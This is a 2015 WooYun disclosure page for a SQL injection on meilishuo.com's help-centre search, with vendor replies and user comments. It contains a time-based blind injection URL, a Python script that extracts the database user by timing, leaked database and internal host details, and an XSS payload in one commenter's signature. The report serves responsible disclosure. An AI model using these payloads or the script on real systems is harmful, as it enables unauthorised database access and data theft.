当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152540

漏洞标题:美丽说www主站存在SQL注入漏洞(附利用脚本)

相关厂商:美丽说

漏洞作者: 猪猪侠

提交时间:2015-11-07 12:27

修复时间:2015-11-09 18:09

公开时间:2015-11-09 18:09

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-07: 厂商已经确认,细节仅向厂商公开
2015-11-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

美丽说www主站存在SQL注入漏洞

详细说明:

#1 注入点

http://www.meilishuo.com/helpcenter/search/?title=hello
注入参数:title


#2 注入参数

http://www.meilishuo.com/helpcenter/search/?title=hello';(SELECT * FROM (SELECT(SLEEP(5)))ring)#


SLEEP,5秒后成功打开网页

漏洞证明:

数据库:robot
数据库用户:mlsvreader@.10.01.14.217
#3 利用代码

#!/usr/bin/env python
# encoding: utf-8
# meilishuo.py 
# ringzero@0x557.org
import requests
import time
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
for i in range(1,20):
    for _str in payloads:
        start_time = time.time()
        url = "http://www.meilishuo.com/helpcenter/search/?title=hello';(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(USER())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))ring)%23"
        result = requests.get(url).text
        if(time.time() - start_time) > 3:
            print _str

修复方案:

# 替换特殊字符

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-07 18:54

厂商回复:

非常感谢您对美丽说安全的关注,经验证该漏洞真实存在,已联系相关人员紧急修复。

最新状态:

2015-11-09:漏洞已修复,谢谢!

漏洞评价:

评论

  1. 2015-11-07 12:30 | 大师兄 ( 路人 | Rank:14 漏洞数:6 | 每日必关注乌云)

    @猪猪侠 赶紧研究股市

  2. 2015-11-07 12:34 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:228 漏洞数:77 | 妈妈,我要上电视)

    你关注的白帽子 猪猪侠 发表了漏洞 美丽说www主站存在SQL注入漏洞(附脚本)

  3. 2015-11-07 12:37 | 浮萍 ( 普通白帽子 | Rank:647 漏洞数:131 | 350)

    周末都不让好好过o(╯□╰)o

  4. 2015-11-07 12:40 | Submit ( 普通白帽子 | Rank:458 漏洞数:102 | 有一天我会成为乌云里的土豪)

    我是来装逼的

  5. 2015-11-07 12:47 | hecate ( 普通白帽子 | Rank:432 漏洞数:71 | ®高级安全工程师 | WooYun认证√)

    生猛!

  6. 2015-11-07 12:51 | 一只猿 ( 普通白帽子 | Rank:483 漏洞数:90 | 硬件与无线通信研究方向)

    这是有神器啊

  7. 2015-11-07 13:07 | 胡小树 ( 实习白帽子 | Rank:64 漏洞数:12 | 我是一颗小小树)

    我看出来了,唯品会主站注入、美丽说主站注入,坐等蘑菇街、聚美优品等躺枪

  8. 2015-11-07 13:08 | 胡小树 ( 实习白帽子 | Rank:64 漏洞数:12 | 我是一颗小小树)

    我看出来了,唯品会主站注入、美丽说主站注入,坐等蘑菇街、聚美优品等躺枪

  9. 2015-11-07 13:10 | 随风的风 ( 普通白帽子 | Rank:131 漏洞数:51 | [code]时光如水,总是无言,你若安好,便是...)

    我看出来了,唯品会主站注入、美丽说主站注入,坐等蘑菇街、聚美优品等躺枪

  10. 2015-11-07 13:14 | qhwlpg ( 普通白帽子 | Rank:239 漏洞数:63 | 潜心代码审计。)

    你关注的白帽子 猪猪侠 发表了漏洞 美丽说www主站存在SQL注入漏洞(附脚本)

  11. 2015-11-07 13:30 | Daryl ( 路人 | Rank:16 漏洞数:4 | '"><img/src=1 onerror=alert('干啥啥不会'...)

    我看出来了,唯品会主站注入、美丽说主站注入,坐等蘑菇街、聚美优品等躺枪

  12. 2015-11-07 13:53 | JiuShao ( 普通白帽子 | Rank:409 漏洞数:95 | ╮(╯▽╰)╭锄禾日当午)

    我看出来了,猪猪侠这是神器出世了

  13. 2015-11-07 14:15 | 慢慢 ( 普通白帽子 | Rank:255 漏洞数:70 | 学习新姿势~)

    我看出来了,唯品会主站注入、美丽说主站注入,坐等蘑菇街、聚美优品等躺枪

  14. 2015-11-07 14:30 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    再来加一个 楚楚街吧

  15. 2015-11-07 15:21 | loopx9 ( 核心白帽子 | Rank:679 漏洞数:66 | ..)

    这通常都是猪哥在测试神器。。。

  16. 2015-11-07 15:25 | null_z ( 普通白帽子 | Rank:316 漏洞数:42 )

    猪哥你的微博被封了,赶紧日了新浪解封账号吧

  17. 2015-11-07 15:56 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

    我看出来了,唯品会主站注入、美丽说主站注入,坐等蘑菇街、聚美优品等躺枪

  18. 2015-11-07 16:06 | 马丁 ( 路人 | Rank:28 漏洞数:24 | 大爷~给口饭吧。)

    马上双11了 我想买点东西

  19. 2015-11-08 09:53 | 无心sec ( 路人 | Rank:4 漏洞数:1 | →_→)

    牛逼